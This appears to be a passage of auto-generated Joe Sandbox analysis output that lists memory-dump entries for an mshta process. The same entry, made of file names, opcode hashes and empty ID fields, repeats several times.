                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12461797450.0000000002DB0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_2db0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                                                                                                                                                        • Instruction ID: be4dc51dc773ca5e33e7f914e99e8a69f493d84a47cecd66cb6e8439de98946c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12461797450.0000000002DB0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_2db0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                                                                                                                                                        • Instruction ID: be4dc51dc773ca5e33e7f914e99e8a69f493d84a47cecd66cb6e8439de98946c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12461797450.0000000002DB0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_2db0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                                                                                                                                                        • Instruction ID: be4dc51dc773ca5e33e7f914e99e8a69f493d84a47cecd66cb6e8439de98946c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: